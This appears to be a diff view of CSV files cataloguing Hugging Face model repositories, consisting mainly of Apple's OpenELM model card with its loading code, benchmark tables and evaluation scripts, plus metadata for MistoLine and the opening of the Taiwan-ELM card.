","{""id"": ""TheMistoAI/MistoLine"", ""author"": ""TheMistoAI"", ""sha"": ""344915650d49be75168c2c20e67bb18cb4341ae3"", ""last_modified"": ""2024-05-17 12:17:27+00:00"", ""created_at"": ""2024-05-07 10:15:16+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 12515, ""downloads_all_time"": null, ""likes"": 438, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""art"", ""stable diffusion"", ""ControlNet"", ""SDXL"", ""Diffusion-XL"", ""text-to-image"", ""arxiv:2302.05543"", ""license:openrail++"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: openrail++\npipeline_tag: text-to-image\ntags:\n- art\n- stable diffusion\n- ControlNet\n- SDXL\n- Diffusion-XL"", ""widget_data"": null, ""model_index"": null, ""config"": {}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Anyline/MTEED.pth', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/comfyui.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/comparison.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/controlnet_1.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/controlnet_2.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/intro.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/model_rendering.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/preprocessors.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/sketch_rendering.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mistoLine_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mistoLine_rank256.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [""radames/Real-Time-Latent-Consistency-Model"", ""radames/Enhance-This-HiDiffusion-SDXL"", ""r3gm/DiffuseCraft"", ""John6666/DiffuseCraftMod"", ""radames/MistoLine-ControlNet-demo"", ""John6666/votepurchase-multiple-model"", ""fffiloni/sdxl-control-loras"", ""Shakker-Labs/FLUX.1-dev-ControlNet-Union-Pro-2.0"", ""Menyu/DiffuseCraftMod"", ""John6666/Enhance-This-HiDiffusion-SDXL"", ""bobber/DiffuseCraft"", ""awacke1/MistoLine-ControlNet-demo"", ""saikub/Text-To-Gif"", ""John6666/testvp"", ""realestate/TheMistoAI-MistoLine"", ""Headbandz/TheMistoAI-MistoLine"", ""seronda93/TheMistoAI-MistoLine"", ""jerry0719/TheMistoAI-MistoLine"", ""Faustrix/Image-Generator"", ""Faustrix/TheMistoAI-MistoLine"", ""ShabeehShakkir/TheMistoAI-MistoLine"", ""CaptainDao/TheMistoAI-MistoLine"", ""Phindx/TheMistoAI-MistoLine"", ""Donopot/TheMistoAI-MistoLine"", ""suxuefeng/TheMistoAI-MistoLine"", ""saleem12/TheMistoAI-MistoLine"", ""Ugottaloveit/TheMistoAI-MistoLine"", ""Bossmarc747/innohub-image-generators"", ""jasonkatz/TheMistoAI-MistoLine"", ""pantx/TheMistoAI-MistoLine"", ""lvkuan/TheMistoAI-MistoLine"", ""scribbyotx/stabilityai-stable-diffusion-xl-base-1.078"", ""VitOliv/TheMistoAI-MistoLine_Test_aula"", ""Holiday12/TheMistoAI-MistoLine"", ""ahmedemara10/TheMistoAI-MistoLine"", ""Hazecnia/TheMistoAI-MistoLine"", ""kwhench/TheMistoAI-MistoLine"", ""pavankris/TheMistoAI-MistoLine"", ""blazekicker/TheMistoAI-MistoLine"", ""nofunstudio/TheMistoAI-MistoLine"", ""John6666/qwen2vl-flux-zero"", ""LAJILAODEEAIQ/officechat-DiffuseCraftMod"", ""eMILF2/real-time-model"", ""eienmojiki/DiffuseCraftMod"", ""John6666/Enhance-This-HiDiffusion-SDXL-Zero"", ""John6666/Enhance-This-HiDiffusion-SDXL-Zero-Gradio4"", ""LPX55/qwen2vl-flux""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-17 12:17:27+00:00"", ""cardData"": ""license: openrail++\npipeline_tag: text-to-image\ntags:\n- art\n- stable diffusion\n- ControlNet\n- SDXL\n- Diffusion-XL"", ""transformersInfo"": null, ""_id"": ""6639ff34e2aa2c4973db4fbb"", ""modelId"": ""TheMistoAI/MistoLine"", ""usedStorage"": 3548847597}",0,,0,"https://huggingface.co/ALT2/123cfcx, https://huggingface.co/tom1-ll/RoseAllround, https://huggingface.co/luispine/wildfireIAUV, https://huggingface.co/Rolyaj/Clippy",4,,0,,0,"John6666/DiffuseCraftMod, John6666/Enhance-This-HiDiffusion-SDXL, John6666/Enhance-This-HiDiffusion-SDXL-Zero, John6666/votepurchase-multiple-model, Menyu/DiffuseCraftMod, Shakker-Labs/FLUX.1-dev-ControlNet-Union-Pro-2.0, awacke1/MistoLine-ControlNet-demo, bobber/DiffuseCraft, eienmojiki/DiffuseCraftMod, huggingface/InferenceSupport/discussions/new?title=TheMistoAI/MistoLine&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTheMistoAI%2FMistoLine%5D(%2FTheMistoAI%2FMistoLine)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, r3gm/DiffuseCraft, radames/Enhance-This-HiDiffusion-SDXL, saikub/Text-To-Gif",13
|
NV-Embed-v2_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
OpenELM_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv
ADDED
|
@@ -0,0 +1,286 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
apple/OpenELM,"---
|
| 3 |
+
license: other
|
| 4 |
+
license_name: apple-sample-code-license
|
| 5 |
+
license_link: LICENSE
|
| 6 |
+
---
|
| 7 |
+
|
| 8 |
+
# OpenELM: An Efficient Language Model Family with Open Training and Inference Framework
|
| 9 |
+
|
| 10 |
+
*Sachin Mehta, Mohammad Hossein Sekhavat, Qingqing Cao, Maxwell Horton, Yanzi Jin, Chenfan Sun, Iman Mirzadeh, Mahyar Najibi, Dmitry Belenko, Peter Zatloukal, Mohammad Rastegari*
|
| 11 |
+
|
| 12 |
+
We introduce **OpenELM**, a family of **Open** **E**fficient **L**anguage **M**odels. OpenELM uses a layer-wise scaling strategy to efficiently allocate parameters within each layer of the transformer model, leading to enhanced accuracy. We pretrained OpenELM models using the [CoreNet](https://github.com/apple/corenet) library. We release both pretrained and instruction tuned models with 270M, 450M, 1.1B and 3B parameters.
|
| 13 |
+
|
| 14 |
+
Our pre-training dataset contains RefinedWeb, deduplicated PILE, a subset of RedPajama, and a subset of Dolma v1.6, totaling approximately 1.8 trillion tokens. Please check license agreements and terms of these datasets before using them.
|
| 15 |
+
|
| 16 |
+
See the list below for the details of each model:
|
| 17 |
+
|
| 18 |
+
- [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M)
|
| 19 |
+
- [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M)
|
| 20 |
+
- [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B)
|
| 21 |
+
- [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B)
|
| 22 |
+
- [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct)
|
| 23 |
+
- [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct)
|
| 24 |
+
- [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct)
|
| 25 |
+
- [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
```python
|
| 29 |
+
|
| 30 |
+
from transformers import AutoModelForCausalLM
|
| 31 |
+
|
| 32 |
+
openelm_270m = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-270M"", trust_remote_code=True)
|
| 33 |
+
openelm_450m = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-450M"", trust_remote_code=True)
|
| 34 |
+
openelm_1b = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-1_1B"", trust_remote_code=True)
|
| 35 |
+
openelm_3b = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-3B"", trust_remote_code=True)
|
| 36 |
+
|
| 37 |
+
openelm_270m_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-270M-Instruct"", trust_remote_code=True)
|
| 38 |
+
openelm_450m_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-450M-Instruct"", trust_remote_code=True)
|
| 39 |
+
openelm_1b_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-1_1B-Instruct"", trust_remote_code=True)
|
| 40 |
+
openelm_3b_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-3B-Instruct"", trust_remote_code=True)
|
| 41 |
+
|
| 42 |
+
```
|
| 43 |
+
|
| 44 |
+
## Usage
|
| 45 |
+
|
| 46 |
+
We have provided an example function to generate output from OpenELM models loaded via [HuggingFace Hub](https://huggingface.co/docs/hub/) in `generate_openelm.py`.
|
| 47 |
+
|
| 48 |
+
You can try the model by running the following command:
|
| 49 |
+
```
|
| 50 |
+
python generate_openelm.py --model [MODEL_NAME] --hf_access_token [HF_ACCESS_TOKEN] --prompt 'Once upon a time there was' --generate_kwargs repetition_penalty=1.2
|
| 51 |
+
```
|
| 52 |
+
Please refer to [this link](https://huggingface.co/docs/hub/security-tokens) to obtain your hugging face access token.
|
| 53 |
+
|
| 54 |
+
Additional arguments to the hugging face generate function can be passed via `generate_kwargs`. As an example, to speedup the inference, you can try [lookup token speculative generation](https://huggingface.co/docs/transformers/generation_strategies) by passing the `prompt_lookup_num_tokens` argument as follows:
|
| 55 |
+
```
|
| 56 |
+
python generate_openelm.py --model [MODEL_NAME] --hf_access_token [HF_ACCESS_TOKEN] --prompt 'Once upon a time there was' --generate_kwargs repetition_penalty=1.2 prompt_lookup_num_tokens=10
|
| 57 |
+
```
|
| 58 |
+
Alternatively, try model-wise speculative generation with an [assistive model](https://huggingface.co/blog/assisted-generation) by passing a smaller model through the `assistant_model` argument, for example:
|
| 59 |
+
```
|
| 60 |
+
python generate_openelm.py --model [MODEL_NAME] --hf_access_token [HF_ACCESS_TOKEN] --prompt 'Once upon a time there was' --generate_kwargs repetition_penalty=1.2 --assistant_model [SMALLER_MODEL_NAME]
|
| 61 |
+
```
|
| 62 |
+
|
| 63 |
+
|
| 64 |
+
## Main Results
|
| 65 |
+
|
| 66 |
+
### Zero-Shot
|
| 67 |
+
|
| 68 |
+
| **Model Size** | **ARC-c** | **ARC-e** | **BoolQ** | **HellaSwag** | **PIQA** | **SciQ** | **WinoGrande** | **Average** |
|
| 69 |
+
|-----------------------------------------------------------------------------|-----------|-----------|-----------|---------------|-----------|-----------|----------------|-------------|
|
| 70 |
+
| [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M) | 26.45 | 45.08 | **53.98** | 46.71 | 69.75 | **84.70** | **53.91** | 54.37 |
|
| 71 |
+
| [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct) | **30.55** | **46.68** | 48.56 | **52.07** | **70.78** | 84.40 | 52.72 | **55.11** |
|
| 72 |
+
| [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M) | 27.56 | 48.06 | 55.78 | 53.97 | 72.31 | 87.20 | 58.01 | 57.56 |
|
| 73 |
+
| [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct) | **30.38** | **50.00** | **60.37** | **59.34** | **72.63** | **88.00** | **58.96** | **59.95** |
|
| 74 |
+
| [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B) | 32.34 | **55.43** | 63.58 | 64.81 | **75.57** | **90.60** | 61.72 | 63.44 |
|
| 75 |
+
| [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct) | **37.97** | 52.23 | **70.00** | **71.20** | 75.03 | 89.30 | **62.75** | **65.50** |
|
| 76 |
+
| [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B) | 35.58 | 59.89 | 67.40 | 72.44 | 78.24 | **92.70** | 65.51 | 67.39 |
|
| 77 |
+
| [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct) | **39.42** | **61.74** | **68.17** | **76.36** | **79.00** | 92.50 | **66.85** | **69.15** |
|
| 78 |
+
|
| 79 |
+
### LLM360
|
| 80 |
+
|
| 81 |
+
| **Model Size** | **ARC-c** | **HellaSwag** | **MMLU** | **TruthfulQA** | **WinoGrande** | **Average** |
|
| 82 |
+
|-----------------------------------------------------------------------------|-----------|---------------|-----------|----------------|----------------|-------------|
|
| 83 |
+
| [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M) | 27.65 | 47.15 | 25.72 | **39.24** | **53.83** | 38.72 |
|
| 84 |
+
| [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct) | **32.51** | **51.58** | **26.70** | 38.72 | 53.20 | **40.54** |
|
| 85 |
+
| [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M) | 30.20 | 53.86 | **26.01** | 40.18 | 57.22 | 41.50 |
|
| 86 |
+
| [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct) | **33.53** | **59.31** | 25.41 | **40.48** | **58.33** | **43.41** |
|
| 87 |
+
| [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B) | 36.69 | 65.71 | **27.05** | 36.98 | 63.22 | 45.93 |
|
| 88 |
+
| [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct) | **41.55** | **71.83** | 25.65 | **45.95** | **64.72** | **49.94** |
|
| 89 |
+
| [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B) | 42.24 | 73.28 | **26.76** | 34.98 | 67.25 | 48.90 |
|
| 90 |
+
| [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct) | **47.70** | **76.87** | 24.80 | **38.76** | **67.96** | **51.22** |
|
| 91 |
+
|
| 92 |
+
|
| 93 |
+
### OpenLLM Leaderboard
|
| 94 |
+
|
| 95 |
+
| **Model Size** | **ARC-c** | **CrowS-Pairs** | **HellaSwag** | **MMLU** | **PIQA** | **RACE** | **TruthfulQA** | **WinoGrande** | **Average** |
|
| 96 |
+
|-----------------------------------------------------------------------------|-----------|-----------------|---------------|-----------|-----------|-----------|----------------|----------------|-------------|
|
| 97 |
+
| [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M) | 27.65 | **66.79** | 47.15 | 25.72 | 69.75 | 30.91 | **39.24** | **53.83** | 45.13 |
|
| 98 |
+
| [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct) | **32.51** | 66.01 | **51.58** | **26.70** | **70.78** | 33.78 | 38.72 | 53.20 | **46.66** |
|
| 99 |
+
| [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M) | 30.20 | **68.63** | 53.86 | **26.01** | 72.31 | 33.11 | 40.18 | 57.22 | 47.69 |
|
| 100 |
+
| [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct) | **33.53** | 67.44 | **59.31** | 25.41 | **72.63** | **36.84** | **40.48** | **58.33** | **49.25** |
|
| 101 |
+
| [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B) | 36.69 | **71.74** | 65.71 | **27.05** | **75.57** | 36.46 | 36.98 | 63.22 | 51.68 |
|
| 102 |
+
| [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct) | **41.55** | 71.02 | **71.83** | 25.65 | 75.03 | **39.43** | **45.95** | **64.72** | **54.40** |
|
| 103 |
+
| [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B) | 42.24 | **73.29** | 73.28 | **26.76** | 78.24 | **38.76** | 34.98 | 67.25 | 54.35 |
|
| 104 |
+
| [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct) | **47.70** | 72.33 | **76.87** | 24.80 | **79.00** | 38.47 | **38.76** | **67.96** | **55.73** |
|
| 105 |
+
|
| 106 |
+
See the technical report for more results and comparison.
|
| 107 |
+
|
| 108 |
+
## Evaluation
|
| 109 |
+
|
| 110 |
+
### Setup
|
| 111 |
+
|
| 112 |
+
Install the following dependencies:
|
| 113 |
+
|
| 114 |
+
```bash
|
| 115 |
+
|
| 116 |
+
# install public lm-eval-harness
|
| 117 |
+
|
| 118 |
+
harness_repo=""public-lm-eval-harness""
|
| 119 |
+
git clone https://github.com/EleutherAI/lm-evaluation-harness ${harness_repo}
|
| 120 |
+
cd ${harness_repo}
|
| 121 |
+
# use main branch on 03-15-2024, SHA is dc90fec
|
| 122 |
+
git checkout dc90fec
|
| 123 |
+
pip install -e .
|
| 124 |
+
cd ..
|
| 125 |
+
|
| 126 |
+
# 66d6242 is the main branch on 2024-04-01
|
| 127 |
+
pip install datasets@git+https://github.com/huggingface/datasets.git@66d6242
|
| 128 |
+
pip install tokenizers>=0.15.2 transformers>=4.38.2 sentencepiece>=0.2.0
|
| 129 |
+
|
| 130 |
+
```
|
| 131 |
+
|
| 132 |
+
### Evaluate OpenELM
|
| 133 |
+
|
| 134 |
+
```bash
|
| 135 |
+
|
| 136 |
+
# OpenELM-270M
|
| 137 |
+
hf_model=apple/OpenELM-270M
|
| 138 |
+
|
| 139 |
+
# this flag is needed because lm-eval-harness set add_bos_token to False by default, but OpenELM uses LLaMA tokenizer which requires add_bos_token to be True
|
| 140 |
+
tokenizer=meta-llama/Llama-2-7b-hf
|
| 141 |
+
add_bos_token=True
|
| 142 |
+
batch_size=1
|
| 143 |
+
|
| 144 |
+
mkdir lm_eval_output
|
| 145 |
+
|
| 146 |
+
shot=0
|
| 147 |
+
task=arc_challenge,arc_easy,boolq,hellaswag,piqa,race,winogrande,sciq,truthfulqa_mc2
|
| 148 |
+
lm_eval --model hf \
|
| 149 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 150 |
+
--tasks ${task} \
|
| 151 |
+
--device cuda:0 \
|
| 152 |
+
--num_fewshot ${shot} \
|
| 153 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 154 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 155 |
+
|
| 156 |
+
shot=5
|
| 157 |
+
task=mmlu,winogrande
|
| 158 |
+
lm_eval --model hf \
|
| 159 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 160 |
+
--tasks ${task} \
|
| 161 |
+
--device cuda:0 \
|
| 162 |
+
--num_fewshot ${shot} \
|
| 163 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 164 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 165 |
+
|
| 166 |
+
shot=25
|
| 167 |
+
task=arc_challenge,crows_pairs_english
|
| 168 |
+
lm_eval --model hf \
|
| 169 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 170 |
+
--tasks ${task} \
|
| 171 |
+
--device cuda:0 \
|
| 172 |
+
--num_fewshot ${shot} \
|
| 173 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 174 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 175 |
+
|
| 176 |
+
shot=10
|
| 177 |
+
task=hellaswag
|
| 178 |
+
lm_eval --model hf \
|
| 179 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 180 |
+
--tasks ${task} \
|
| 181 |
+
--device cuda:0 \
|
| 182 |
+
--num_fewshot ${shot} \
|
| 183 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 184 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 185 |
+
|
| 186 |
+
```
|
| 187 |
+
|
| 188 |
+
|
| 189 |
+
## Bias, Risks, and Limitations
|
| 190 |
+
|
| 191 |
+
The release of OpenELM models aims to empower and enrich the open research community by providing access to state-of-the-art language models. Trained on publicly available datasets, these models are made available without any safety guarantees. Consequently, there exists the possibility of these models producing outputs that are inaccurate, harmful, biased, or objectionable in response to user prompts. Thus, it is imperative for users and developers to undertake thorough safety testing and implement appropriate filtering mechanisms tailored to their specific requirements.
|
| 192 |
+
|
| 193 |
+
## Citation
|
| 194 |
+
|
| 195 |
+
If you find our work useful, please cite:
|
| 196 |
+
|
| 197 |
+
```BibTex
|
| 198 |
+
@article{mehtaOpenELMEfficientLanguage2024,
|
| 199 |
+
title = {{OpenELM}: {An} {Efficient} {Language} {Model} {Family} with {Open} {Training} and {Inference} {Framework}},
|
| 200 |
+
shorttitle = {{OpenELM}},
|
| 201 |
+
url = {https://arxiv.org/abs/2404.14619v1},
|
| 202 |
+
language = {en},
|
| 203 |
+
urldate = {2024-04-24},
|
| 204 |
+
journal = {arXiv.org},
|
| 205 |
+
author = {Mehta, Sachin and Sekhavat, Mohammad Hossein and Cao, Qingqing and Horton, Maxwell and Jin, Yanzi and Sun, Chenfan and Mirzadeh, Iman and Najibi, Mahyar and Belenko, Dmitry and Zatloukal, Peter and Rastegari, Mohammad},
|
| 206 |
+
month = apr,
|
| 207 |
+
year = {2024},
|
| 208 |
+
}
|
| 209 |
+
|
| 210 |
+
@inproceedings{mehta2022cvnets,
|
| 211 |
+
author = {Mehta, Sachin and Abdolhosseini, Farzad and Rastegari, Mohammad},
|
| 212 |
+
title = {CVNets: High Performance Library for Computer Vision},
|
| 213 |
+
year = {2022},
|
| 214 |
+
booktitle = {Proceedings of the 30th ACM International Conference on Multimedia},
|
| 215 |
+
series = {MM '22}
|
| 216 |
+
}
|
| 217 |
+
```
|
| 218 |
+
","{""id"": ""apple/OpenELM"", ""author"": ""apple"", ""sha"": ""602b24f644595960864ed3de780a4ef9889315ed"", ""last_modified"": ""2024-05-02 00:54:23+00:00"", ""created_at"": ""2024-04-17 20:01:04+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1434, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""arxiv:2404.14619"", ""license:other"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: other\nlicense_name: apple-sample-code-license\nlicense_link: LICENSE"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generate_openelm.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Norod78/OpenELM_3B_Demo"", ""cmjatom/OpenELM_3B_Demo"", ""KvrParaskevi/OpenELM_3B_Demo"", ""JERNGOC/Apple_elm_test""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-02 00:54:23+00:00"", ""cardData"": ""license: other\nlicense_name: apple-sample-code-license\nlicense_link: LICENSE"", ""transformersInfo"": null, ""_id"": ""66202a80b6b17117b91a7a55"", ""modelId"": ""apple/OpenELM"", ""usedStorage"": 0}",0,"https://huggingface.co/liswei/Taiwan-ELM, https://huggingface.co/cpu4dream/llava-small-OpenELM-AIMv2-0.6B",2,,0,https://huggingface.co/cpu4dream/llava-small-OpenELM-AIMv2-0.6B-auto,1,,0,"JERNGOC/Apple_elm_test, KvrParaskevi/OpenELM_3B_Demo, Norod78/OpenELM_3B_Demo, cmjatom/OpenELM_3B_Demo, huggingface/InferenceSupport/discussions/new?title=apple/OpenELM&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bapple%2FOpenELM%5D(%2Fapple%2FOpenELM)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",5
|
| 219 |
+
liswei/Taiwan-ELM,"---
|
| 220 |
+
license: apache-2.0
|
| 221 |
+
datasets:
|
| 222 |
+
- liswei/Taiwan-Text-Excellence-2B
|
| 223 |
+
- liswei/PromptPair-TW
|
| 224 |
+
- yentinglin/TaiwanChat
|
| 225 |
+
base_model: apple/OpenELM
|
| 226 |
+
language:
|
| 227 |
+
- zh
|
| 228 |
+
---
|
| 229 |
+
|
| 230 |
+
<center>
|
| 231 |
+
<img src=""https://huggingface.co/liswei/Taiwan-ELM/resolve/main/Taiwan%20ELM%20Logo.jpeg"" alt=""Efficient LLM for Taiwan"">
|
| 232 |
+
</center>
|
| 233 |
+
|
| 234 |
+
> Efficient LLM for Taiwan with open weights/datasets/checkpoints and affordable sizes (270M/1.1B)
|
| 235 |
+
|
| 236 |
+
# Taiwan ELM
|
| 237 |
+
|
| 238 |
+
